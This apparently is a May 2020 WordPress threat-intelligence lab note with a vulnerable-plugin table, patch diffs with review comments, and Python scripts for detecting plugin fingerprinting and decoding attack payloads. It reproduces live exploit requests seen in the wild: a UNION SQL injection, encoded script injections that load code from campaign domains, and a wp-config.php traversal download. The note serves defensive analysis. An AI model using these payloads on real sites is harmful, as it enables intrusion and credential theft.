Relevant Plugins and Vulnerabilities:
| Plugin | Vulnerability | Patched Version | Installs |
| --- | --- | --- | --- |
| WP Product Review | Unauthenticated Stored XSS | 3.7.6 | 40000 |
| Form Maker by 10Web | Authenticated SQL Injection | — | 100000 |
| Add-on SweetAlert Contact Form 7 | Authenticated XSS | 1.0.8 | 20 |
| Paid Memberships Pro | Authenticated SQL Injection | 2.3.3 | 90000 |
| Visual Composer | Authenticated XSS | 27 | 80000 |
| Team Members | Authenticated XSS | 5.0.4 | 40000 |
| Photo Gallery by 10Web | Unauthenticated SQL Injection | 1.5.55 | 300000 |
| Login/Signup Popup | Authenticated XSS | 1.5 | 10000 |
| Easy Testimonials | Authenticated Stored XSS | 3.6 | 30000 |
| WooCommerce | Unescaped Metadata | 4.1.0 | 5000000 |
| Page Builder by SiteOrigin | CSRF to XSS | 2.10.16 | 1000000 |
| Chopslider | Authenticated SQL Injection | — | 200 |
| Elementor Pro | Authenticated File Upload | 2.9.4 | 100000 |
| LearnPress | Privilege Escalation | 3.2.6.9 | 80000 |
| Elementor | Authenticated Stored XSS | 2.9.8 | 4000000 |
| Avada | Authenticated Stored XSS | 6.2.3 | 500000 |
| Ninja Forms | CSRF to Stored XSS | 3.4.24.2 | 1000000 |
| Advanced Order Export For Woo | Authenticated XSS | 3.1.4 | 90000 |
| Quick Page/Post redirect | Authenticated Settings Update | — | 100000 |
| Ultimate Addons for Elementor | Registration Bypass | 1.24.2 | 100000 |
| WTI Like Post | Authenticated XSS | — | 10000 |
| WP-Advanced-Search | Authenticated SQL Injection | 3.3.7 | 1000 |
| Gmedia Photo Gallery | Authenticated XSS | 1.18.5 | 10000 |
Highlights for May 2020
- Cross-site scripting is still the most prevalent vulnerability class. Attackers are taking advantage of missing capability and nonce checks on critical functions, and of user input that is stored or echoed without sanitization or escaping.
- Unprotected AJAX action bugs are still on the rise, and attackers are automating their injections against vulnerable plugins as soon as a bug is public.
- Attackers have added three plugins and a series of new malicious IPs to their arsenal in an ongoing massive malware campaign targeting WordPress websites with known vulnerabilities.
Details for these highlights can be found under the components listed below.
WP Product Review
Two weeks ago, we reported an unauthenticated stored cross-site scripting vulnerability in WP Product Review. It was caused by a REST route registered without a permission_callback, so anyone could call it, combined with the review name being echoed into an HTML attribute without escaping.
Only a few days after the disclosure of this vulnerability, attackers began to scan for vulnerable sites:
181.58.21.65 - - [18/May/2020:17:21:10 +0000] "GET //wp-content/plugins/wp-product-review/assets/js/main.js HTTP/1.1"
139.198.16.241 - - [18/May/2020:17:15:36 +0000] "GET //wp-content/plugins/wp-product-review/readme.txt HTTP/1.1"
185.162.127.248 - - [17/May/2020:03:38:15 +0000] "GET /wp-content/plugins/wp-product-review/assets/js/main.js HTTP/1.1"
213.159.210.170 - - [17/May/2020:01:35:04 +0000] "GET /wp-content/plugins/wp-product-review/assets/js/main.js HTTP/1.1"
Patch (version 3.7.6):
Index: wp-product-review/trunk/includes/gutenberg/class-wppr-gutenberg.php =================================================================== --- a/wp-product-review/trunk/includes/gutenberg/class-wppr-gutenberg.php +++ b/wp-product-review/trunk/includes/gutenberg/class-wppr-gutenberg.php @@ -97,4 +97,7 @@ 'methods' => 'POST', 'callback' => array( $this, 'update_review_callback' ), + 'permission_callback' => function () { + return current_user_can( 'edit_posts' ); + }, 'args' => array( 'id' => array( --- Index: wp-product-review/trunk/includes/functions.php =================================================================== --- a/wp-product-review/trunk/includes/functions.php +++ b/wp-product-review/trunk/includes/functions.php @@ -229,5 +229,5 @@ } ?> - <a title="<?php echo $review_object->get_name(); ?>" class="<?php echo $class_a; ?>" href="<?php echo esc_url( $image_link ); ?>" <?php echo $lightbox; ?> rel="nofollow" target="_blank"> + <a title="<?php echo esc_attr( $review_object->get_name() ); ?>" class="<?php echo $class_a; ?>" href="<?php echo esc_url( $image_link ); ?>" <?php echo $lightbox; ?> rel="nofollow" target="_blank"> <img src="<?php echo esc_attr( $src ); ?>"
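Review bot: in the class-wppr-gutenberg.php hunk the new permission_callback checks the blanket `edit_posts` capability, but the route takes an `id` argument and updates that specific review, so any Contributor can now update reviews they do not own. Suggest giving the closure the `$request` parameter and checking the target post instead: `'permission_callback' => function ( $request ) { return current_user_can( 'edit_post', (int) $request['id'] ); }`, which still rejects unauthenticated callers.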
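Review bot: in the functions.php hunk only `$review_object->get_name()` gains `esc_attr()`; on the same `+` line `$class_a` and `$lightbox` are still echoed into the `<a>` tag without escaping. If either value can be influenced by a review author they need the same treatment (`esc_attr()` for the class, and the lightbox attribute string assembled from escaped pieces); if they are plugin-generated constants, a short comment saying so would save the next reviewer the question.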
Elementor
Earlier this month, Elementor Pro fixed an arbitrary file upload vulnerability (patched in 2.9.4) caused by an unprotected Ajax hook. It wasn't long before attackers started exploiting it.
Our team identified these malicious IPs probing for installations of both Elementor Pro and Ultimate Addons for Elementor. The pairing is deliberate: the Elementor Pro upload requires an authenticated user, and the registration bypass in Ultimate Addons for Elementor (fixed in 1.24.2, see the table above) is a way for an attacker to obtain that low-privileged account.
69.164.207.140 - - [08/May/2020:15:59:31 +0000] "GET /wp-content/plugins/elementor-pro/assets/js/preview.min.js HTTP/1.1"
45.79.193.100 - - [08/May/2020:16:49:13 +0000] "GET /wp-content/plugins/ultimate-elementor/assets/css/modules/business-hours.css HTTP/1.1"
62.210.172.66 - - [10/May/2020:02:33:29 +0000] "GET /wp-content/plugins/ultimate-elementor/assets/min-js/uael-registration.min.js HTTP/1.1"
62.210.84.69 - - [13/May/2020:08:13:57 +0000] "GET /wp-content/plugins/elementor-pro/assets/css/frontend.min.css HTTP/1.1"
62.210.172.66 - - [13/May/2020:08:21:05 +0000] "GET /wp-content/plugins/elementor-pro/assets/css/frontend.min.css HTTP/1.1"
[...]
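The two log excerpts above (WP Product Review and Elementor) show the same pattern: before firing an exploit, the scanner fetches a static asset of the plugin to learn whether it is installed. The script below is an added example and not part of this lab note: it parses those access-log lines, maps each request to the plugin slug under wp-content/plugins/, and reports per source IP which watched plugins were probed, together with two scanner tells visible in the excerpts (the leading double slash and the readme.txt version probe) and whether the IP is in the campaign list given further down this page. The WATCHED_SLUGS mapping, the function names and the one extra non-plugin line marked as constructed are this example's own; the plugin log lines are copied from the excerpts above.

```python
# Added example (not from the lab note): spot plugin fingerprinting in an
# Apache-style access log. Scanners fetch a plugin's static files to confirm it
# is installed before sending the exploit request.
import re

# Plugin directory names seen in the logged paths, mapped to the entry in the
# vulnerability table at the top of this note.
WATCHED_SLUGS = {
    "wp-product-review": "WP Product Review, unauthenticated stored XSS, fixed in 3.7.6",
    "elementor-pro": "Elementor Pro, authenticated file upload, fixed in 2.9.4",
    "ultimate-elementor": "Ultimate Addons for Elementor, registration bypass, fixed in 1.24.2",
}

# IPs this note associates with the campaign (the list given later on the page).
CAMPAIGN_IPS = {
    "79.133.202.70", "154.43.128.23", "185.162.127.248", "51.83.70.152",
    "213.159.210.170", "139.162.28.41", "139.99.169.192", "185.217.0.224",
    "84.238.108.177", "62.210.180.8",
}

# Log lines copied from the excerpts on this page, plus one constructed
# ordinary page view (203.0.113.9) to show that non-plugin traffic is ignored.
LOG_LINES = """\
181.58.21.65 - - [18/May/2020:17:21:10 +0000] "GET //wp-content/plugins/wp-product-review/assets/js/main.js HTTP/1.1"
139.198.16.241 - - [18/May/2020:17:15:36 +0000] "GET //wp-content/plugins/wp-product-review/readme.txt HTTP/1.1"
185.162.127.248 - - [17/May/2020:03:38:15 +0000] "GET /wp-content/plugins/wp-product-review/assets/js/main.js HTTP/1.1"
213.159.210.170 - - [17/May/2020:01:35:04 +0000] "GET /wp-content/plugins/wp-product-review/assets/js/main.js HTTP/1.1"
69.164.207.140 - - [08/May/2020:15:59:31 +0000] "GET /wp-content/plugins/elementor-pro/assets/js/preview.min.js HTTP/1.1"
45.79.193.100 - - [08/May/2020:16:49:13 +0000] "GET /wp-content/plugins/ultimate-elementor/assets/css/modules/business-hours.css HTTP/1.1"
62.210.172.66 - - [10/May/2020:02:33:29 +0000] "GET /wp-content/plugins/ultimate-elementor/assets/min-js/uael-registration.min.js HTTP/1.1"
62.210.84.69 - - [13/May/2020:08:13:57 +0000] "GET /wp-content/plugins/elementor-pro/assets/css/frontend.min.css HTTP/1.1"
62.210.172.66 - - [13/May/2020:08:21:05 +0000] "GET /wp-content/plugins/elementor-pro/assets/css/frontend.min.css HTTP/1.1"
203.0.113.9 - - [13/May/2020:09:00:00 +0000] "GET /about/ HTTP/1.1"
"""

# Common-log prefix: ip, ident, user, [timestamp], "METHOD path protocol".
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*"')
# A request for anything inside a plugin directory; '/+' tolerates the
# doubled leading slash that some scanners emit.
PLUGIN_RE = re.compile(r"^/+wp-content/plugins/(?P<slug>[^/]+)/(?P<asset>.*)$")


def parse_line(line: str):
    """Return the fields of one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["double_slash"] = rec["path"].startswith("//")
    pm = PLUGIN_RE.match(rec["path"])
    rec["slug"] = pm.group("slug") if pm else None
    rec["asset"] = pm.group("asset") if pm else None
    return rec


def fingerprint_report(lines) -> dict:
    """Per source IP: watched plugins probed, the assets fetched, scanner tells,
    and whether the IP is already on the campaign list."""
    report = {}
    for raw in lines:
        rec = parse_line(raw)
        if not rec or rec["slug"] not in WATCHED_SLUGS:
            continue
        entry = report.setdefault(rec["ip"], {
            "slugs": set(), "assets": [], "scanner_tells": set(),
            "campaign_ip": rec["ip"] in CAMPAIGN_IPS,
        })
        entry["slugs"].add(rec["slug"])
        entry["assets"].append(rec["asset"])
        if rec["double_slash"]:
            entry["scanner_tells"].add("double-slash path")
        if rec["asset"] == "readme.txt":
            entry["scanner_tells"].add("readme.txt version probe")
    return report


if __name__ == "__main__":
    for ip, entry in fingerprint_report(LOG_LINES.splitlines()).items():
        print(ip, sorted(entry["slugs"]), sorted(entry["scanner_tells"]),
              "campaign IP" if entry["campaign_ip"] else "")
```

On a site where the plugin really is installed, browsers also load these assets as part of normal page views, so the report lists evidence rather than verdicts. The response status (a 404 for a plugin the site does not have) and the Referer header, neither of which the excerpts above include, are the next two fields to add before turning this into an alert.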
Photo Gallery by 10Web
An unauthenticated SQL injection in Photo Gallery by 10Web was fixed this month in version 1.5.55. The vulnerable query is reachable through the `bwg_frontend_data` admin-ajax action, which is how the attack below arrives.
Patch (version 1.5.55):
Index: photo-gallery/trunk/frontend/models/model.php =================================================================== --- a/photo-gallery/trunk/frontend/models/model.php +++ b/photo-gallery/trunk/frontend/models/model.php @@ -197,32 +197,32 @@ public function get_alb_gals_row( $bwg, $id, $albums_per_page, $sort_by, $order_by, $pagination_type = 0, $from = '' ) { - if ( $albums_per_page < 0 ) { + if ( $albums_per_page < 0 ) { $albums_per_page = 0; } global $wpdb; - $order_by = 'ORDER BY</span><span style='color:#02d045; '>'</span> <span style='color:#d2cd86; '>.</span> <span style='color:#d2cd86; '>(</span> <span style='color:#d2cd86; '>(</span><span style='color:#d2cd86; '>!</span>empty<span style='color:#d2cd86; '>(</span>$from<span style='color:#d2cd86; '>)</span> <span style='color:#d2cd86; '>&&</span> $from <span style='color:#d2cd86; '>===</span> <span style='color:#02d045; '>'</span><span style='color:#00c4c4; '>widget</span><span style='color:#02d045; '>'</span><span style='color:#d2cd86; '>)</span> <span style='color:#b060b0; '>?</span> <span style='color:#02d045; '>'</span><span style='color:#00c4c4; '>id</span><span style='color:#02d045; '>'</span> <span style='color:#b060b0; '>:</span> $sort_by <span style='color:#d2cd86; '>)</span> <span style='color:#d2cd86; '>.</span> <span style='color:#02d045; '>'</span><span style='color:#00c4c4; '>
' . $order_by; - if( $sort_by == 'random' || $sort_by == 'RAND()' ) { - $order_by = 'ORDER BY RAND()'; - } - $search_where = ''; - $search_value = trim( WDWLibrary::get('bwg_search_' . $bwg) ); - if ( !empty($search_value) ) { - $search_keys = explode(' ', $search_value); + $order_by = 'ORDER BY</span><span style='color:#02d045; '>'</span> <span style='color:#d2cd86; '>.</span> <span style='color:#d2cd86; '>(</span> <span style='color:#d2cd86; '>(</span> <span style='color:#d2cd86; '>!</span>empty<span style='color:#d2cd86; '>(</span> $from <span style='color:#d2cd86; '>)</span> <span style='color:#d2cd86; '>&&</span> $from <span style='color:#d2cd86; '>===</span> <span style='color:#02d045; '>'</span><span style='color:#00c4c4; '>widget</span><span style='color:#02d045; '>'</span> <span style='color:#d2cd86; '>)</span> <span style='color:#b060b0; '>?</span> <span style='color:#02d045; '>'</span><span style='color:#00c4c4; '>id</span><span style='color:#02d045; '>'</span> <span style='color:#b060b0; '>:</span> $sort_by <span style='color:#d2cd86; '>)</span> <span style='color:#d2cd86; '>.</span> <span style='color:#02d045; '>'</span><span style='color:#00c4c4; '>
' . $order_by; + if ( $sort_by == 'random' || $sort_by == 'RAND()' ) { + $order_by = 'ORDER BY RAND()'; + } + $search_where = ''; + $search_value = trim( WDWLibrary::get( 'bwg_search_' . $bwg ) ); + if ( !empty( $search_value ) ) { + $search_keys = explode( ' ', $search_value ); $alt_search = '('; $description_search = '(';
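Review bot: the visible part of this hunk changes whitespace only. `$order_by = 'ORDER BY ' . ( ... ? 'id' : $sort_by ) . ' ' . $order_by;` still concatenates the caller-supplied `$sort_by` and `$order_by` into the query on the `+` side exactly as on the `-` side, and `$search_keys = explode( ' ', $search_value );` is unchanged too, so whatever 1.5.55 actually validates is not in this hunk. The safer place to enforce it is here rather than in the callers: allow-list `$sort_by` against the sortable column names, restrict `$order_by` to `ASC`/`DESC`, and pass each search key through `$wpdb->esc_like()` into `$wpdb->prepare()` when building the clauses that follow.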
Payload used by attackers (shown URL-encoded as logged; decoded, the `bwg_search_0` value starts with `1# %DFGDFG"))/**/UNION/**/ALL/**/SELECT/**/TABLE_SCHEMA,TABLE_NAME` and selects from `information_schema.tables` to enumerate the database. The `/**/` comments stand in for spaces because the plugin splits the search value on spaces, as the `explode( ' ', $search_value )` line in the patch shows, so a payload containing spaces would be broken into separate keys):
185.162.127.248 -- POST -- /wp-admin/admin-ajax.php -- action=bwg_frontend_data&bwg_search_0=1%23+%25DFGDFG%22%29%29%2F%2A%2A%2FUNION%2F%2A%2A%2FALL%2F%2A%2A%2FSELECT%2F%2A%2A%2FTABLE_SCHEMA%2CTABLE_NAME%2C%27%27%2C%27%27%2C%27%27%2C%27%27%2C%27%27%2C%27%27%2C%27%27%2C%27%27%2C%27%27%2C%27%27%2C%27%27%2C%27%27%2C%27%27%2F%2A%2A%2Fas%2F%2A%2A%2Fdummy_3%2F%2A%2A%2Ffrom%2F%2A%2A%2Finformation_schema.tables%23FGDFGDFG%29%29%23&gallery_type=album_compact_preview&type_0=album -- 2020-05-17
Plugin & Theme Payloads Added to Ongoing Campaign
Malicious Domains & Detected IPs
Our team saw the following new malicious domains injected into an ongoing campaign exploiting known WordPress vulnerabilities this month:
css[.]digestcolect[.]com
cls[.]balantfromsun[.]com
count[.]trackstatisticsss[.]com
The following IPs have also been associated with this campaign:
79.133.202.70
154.43.128.23
185.162.127.248
51.83.70.152
213.159.210.170
139.162.28.41
139.99.169.192
185.217.0.224
84.238.108.177
62.210.180.8
[...]
Exploit Attempts Seen in the Wild
Our team identified attacks against the following vulnerable plugins and themes.
Bold Page Builder (From Last Year)
139.162.28.41 -- POST -- /wp-admin/admin-ajax.php?action=bt_bb_set_custom_css -- css=%3C%2Fstyle%3E%3Cscript++type%3Dtext%2Fjavascript+language%3Djavascript%3Eeval%28String.fromCharCode%2832%2C40%2C102%2C117%2C110%2C99%2C116%2C105%2C111%2C110%2C40%2C41%2C32%2C123%2C10%2C32%2C32%2C32%2C32%2C118%2C97%2C114%2C32%2C101%2C108%2C101%2C109%2C32%2C61%2C32%2C100%2C111%2C99%2C117%2C109%2C101%2C110%2C116%2C46%2C99%2C114%2C101%2C97%2C116%2C101%2C69%2C108%2C101%2C109%2C101%2C110%2C116%2C40%2C39%2C115%2C99%2C114%2C105%2C112%2C116%2C39%2C41%2C59%2C32%2C10%2C9%2C101%2C108%2C101%2C109%2C46%2C116%2C121%2C112%2C101%2C32%2C61%2C32%2C39%2C116%2C101%2C120%2C116%2C47%2C106%2C97%2C118%2C97%2C115%2C99%2C114%2C105%2C112%2C116%2C39%2C59%2C32%2C10%2C32%2C32%2C32%2C32%2C101%2C108%2C101%2C109%2C46%2C115%2C114%2C99%2C32%2C61%2C32%2C39%2C104%2C116%2C116%2C112%2C115%2C58%2C47%2C47%2C99%2C108%2C115%2C46%2C98%2C97%2C108%2C97%2C110%2C116%2C102%2C114%2C111%2C109%2C115%2C117%2C110%2C46%2C99%2C111%2C109%2C47%2C99%2C108%2C115%2C46%2C106%2C115%2C63%2C122%2C61%2C54%2C38%2C39%2C59%2C10%2C32%2C32%2C32%2C32%2C100%2C111%2C99%2C117%2C109%2C101%2C110%2C116%2C46%2C103%2C101%2C116%2C69%2C108%2C101%2C109%2C101%2C110%2C116%2C115%2C66%2C121%2C84%2C97%2C103%2C78%2C97%2C109%2C101%2C40%2C34%2C104%2C101%2C97%2C100%2C34%2C41%2C91%2C48%2C93%2C46%2C97%2C112%2C112%2C101%2C110%2C100%2C67%2C104%2C105%2C108%2C100%2C40%2C101%2C108%2C101%2C109%2C41%2C59%2C10%2C32%2C32%2C125%2C41%2C40%2C41%2C59%29%29%3B%3C%2Fscript%3E%3Cstyle%3E&post_id=1 -- 2020-05-12
WP Quick Booking Manager (from 4 years ago)
139.162.28.41 - action=gen_save_cssfixfront&css=%3C%2Fstyle%3E%3Cscript+type%3D%27text%2Fjavascript%27+src%3D%27https%3A%2F%2Fcss.digestcolect.com%2Fstm%3Fv%3Dl6.0.0%27%3E%3C%2Fscript%3E%3Cstyle%3E&cssfix=front [12/May/2020:04:52:19 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1"
Duplicator Download
62.210.180.8 - - [14/May/2020:14:45:54 +0000] "GET /wp-admin/admin-ajax.php?action=duplicator_download&file=../wp-config.php HTTP/1.1"
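The four exploit requests above (the Photo Gallery injection in the earlier section, the two custom-CSS script injections and the Duplicator download) carry their indicators in encoded form. The script below is an added example and not part of this lab note or of any of the plugins' code: it URL-decodes each request body, expands the `eval(String.fromCharCode(...))` wrapper the Bold Page Builder payload uses, extracts the hosts of any injected URLs and checks them against the campaign domains listed on this page, and flags the UNION-based SQL injection and the path traversal. The request bodies are quoted from the log lines above with the other log fields dropped; the pairing of each body with its action name, the SAMPLES table and the function names are this example's own.

```python
# Added example (not from the lab note or any plugin): decode the admin-ajax
# exploit payloads logged on this page and pull out the indicators inside them.
import re
from urllib.parse import parse_qs, urlsplit

# Campaign domains from this note (listed there defanged as host[.]tld).
CAMPAIGN_DOMAINS = {
    "css.digestcolect.com",
    "cls.balantfromsun.com",
    "count.trackstatisticsss.com",
}

# admin-ajax actions named in the exploit attempts on this page.
WATCHED_ACTIONS = {
    "bwg_frontend_data",     # Photo Gallery by 10Web, unauthenticated SQLi
    "bt_bb_set_custom_css",  # Bold Page Builder, script injected via custom CSS
    "gen_save_cssfixfront",  # WP Quick Booking Manager, script injected via custom CSS
    "duplicator_download",   # Duplicator, arbitrary file download
}

# (action, request body) pairs as logged above. For Bold Page Builder the action
# was in the query string and the body was only css=...&post_id=1.
SAMPLES = {
    "photo_gallery": ("bwg_frontend_data", "action=bwg_frontend_data&bwg_search_0=1%23+%25DFGDFG%22%29%29%2F%2A%2A%2FUNION%2F%2A%2A%2FALL%2F%2A%2A%2FSELECT%2F%2A%2A%2FTABLE_SCHEMA%2CTABLE_NAME%2C%27%27%2C%27%27%2C%27%27%2C%27%27%2C%27%27%2C%27%27%2C%27%27%2C%27%27%2C%27%27%2C%27%27%2C%27%27%2C%27%27%2C%27%27%2F%2A%2A%2Fas%2F%2A%2A%2Fdummy_3%2F%2A%2A%2Ffrom%2F%2A%2A%2Finformation_schema.tables%23FGDFGDFG%29%29%23&gallery_type=album_compact_preview&type_0=album"),
    "bold_page_builder": ("bt_bb_set_custom_css", "css=%3C%2Fstyle%3E%3Cscript++type%3Dtext%2Fjavascript+language%3Djavascript%3Eeval%28String.fromCharCode%2832%2C40%2C102%2C117%2C110%2C99%2C116%2C105%2C111%2C110%2C40%2C41%2C32%2C123%2C10%2C32%2C32%2C32%2C32%2C118%2C97%2C114%2C32%2C101%2C108%2C101%2C109%2C32%2C61%2C32%2C100%2C111%2C99%2C117%2C109%2C101%2C110%2C116%2C46%2C99%2C114%2C101%2C97%2C116%2C101%2C69%2C108%2C101%2C109%2C101%2C110%2C116%2C40%2C39%2C115%2C99%2C114%2C105%2C112%2C116%2C39%2C41%2C59%2C32%2C10%2C9%2C101%2C108%2C101%2C109%2C46%2C116%2C121%2C112%2C101%2C32%2C61%2C32%2C39%2C116%2C101%2C120%2C116%2C47%2C106%2C97%2C118%2C97%2C115%2C99%2C114%2C105%2C112%2C116%2C39%2C59%2C32%2C10%2C32%2C32%2C32%2C32%2C101%2C108%2C101%2C109%2C46%2C115%2C114%2C99%2C32%2C61%2C32%2C39%2C104%2C116%2C116%2C112%2C115%2C58%2C47%2C47%2C99%2C108%2C115%2C46%2C98%2C97%2C108%2C97%2C110%2C116%2C102%2C114%2C111%2C109%2C115%2C117%2C110%2C46%2C99%2C111%2C109%2C47%2C99%2C108%2C115%2C46%2C106%2C115%2C63%2C122%2C61%2C54%2C38%2C39%2C59%2C10%2C32%2C32%2C32%2C32%2C100%2C111%2C99%2C117%2C109%2C101%2C110%2C116%2C46%2C103%2C101%2C116%2C69%2C108%2C101%2C109%2C101%2C110%2C116%2C115%2C66%2C121%2C84%2C97%2C103%2C78%2C97%2C109%2C101%2C40%2C34%2C104%2C101%2C97%2C100%2C34%2C41%2C91%2C48%2C93%2C46%2C97%2C112%2C112%2C101%2C110%2C100%2C67%2C104%2C105%2C108%2C100%2C40%2C101%2C108%2C101%2C109%2C41%2C59%2C10%2C32%2C32%2C125%2C41%2C40%2C41%2C59%29%29%3B%3C%2Fscript%3E%3Cstyle%3E&post_id=1"),
    "quick_booking_manager": ("gen_save_cssfixfront", "action=gen_save_cssfixfront&css=%3C%2Fstyle%3E%3Cscript+type%3D%27text%2Fjavascript%27+src%3D%27https%3A%2F%2Fcss.digestcolect.com%2Fstm%3Fv%3Dl6.0.0%27%3E%3C%2Fscript%3E%3Cstyle%3E&cssfix=front"),
    "duplicator": ("duplicator_download", "action=duplicator_download&file=../wp-config.php"),
}

FROMCHARCODE_RE = re.compile(r"String\.fromCharCode\(\s*([\d\s,]+?)\s*\)", re.I)
URL_RE = re.compile(r"""https?://[^\s'"<>()]+""", re.I)
# UNION [ALL] SELECT with real whitespace or /**/ comments between the keywords.
SQLI_RE = re.compile(r"\bUNION(?:\s|/\*.*?\*/)+(?:ALL(?:\s|/\*.*?\*/)+)?SELECT\b", re.I | re.S)


def expand_fromcharcode(text: str) -> str:
    """Replace every String.fromCharCode(n, n, ...) with the string it builds.
    Loops so that nested wrappers are peeled as well."""
    def _expand(m):
        return "".join(chr(int(n)) for n in m.group(1).split(",") if n.strip())
    previous = None
    while previous != text:
        previous, text = text, FROMCHARCODE_RE.sub(_expand, text)
    return text


def decode_params(body: str) -> dict:
    """URL-decode a form body the way PHP populates $_POST, then expand any
    fromCharCode wrapper inside each value."""
    return {k: expand_fromcharcode(v[0]) for k, v in parse_qs(body, keep_blank_values=True).items()}


def injected_hosts(text: str) -> list:
    """Hostnames of every absolute URL in the decoded text, deduplicated, in order."""
    hosts = []
    for url in URL_RE.findall(text):
        host = urlsplit(url).hostname
        if host and host not in hosts:
            hosts.append(host)
    return hosts


def photo_gallery_search_keys(value: str) -> list:
    """Mirror the plugin's explode(' ', $search_value): a space splits the value
    into separate keys, which is why the injected SQL uses /**/ instead of spaces."""
    return value.strip().split(" ")


def triage(action: str, body: str) -> dict:
    """Decode one admin-ajax request and summarise what it is trying to do."""
    params = decode_params(body)
    joined = "\n".join(params.values())
    hosts = injected_hosts(joined)
    return {
        "action": action,
        "watched_action": action in WATCHED_ACTIONS,
        "sqli": bool(SQLI_RE.search(joined)),
        "script_injection": "<script" in joined.lower(),
        "traversal": "../" in joined,
        "hosts": hosts,
        "campaign_hit": sorted(h for h in hosts if h in CAMPAIGN_DOMAINS),
        "params": params,
    }


if __name__ == "__main__":
    for name, (action, body) in SAMPLES.items():
        verdict = triage(action, body)
        print(name, {k: v for k, v in verdict.items() if k != "params"})
```

The fromCharCode step is what surfaces the second campaign domain: in the raw log line the Bold Page Builder payload is only a numeric array, so grepping access logs for the defanged domains above would miss it. triage() is the function to call per request when replaying a log through this.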
Many other plugins are still under attack, and public exploits already exist for all of the components listed above. Please check our previous lab notes for more information about this ongoing WordPress malware campaign.
To mitigate this threat, keep WordPress core, plugins and themes up to date, and disable or replace any plugin for which no patched version is available. Websites behind the Sucuri Firewall are protected against these exploits.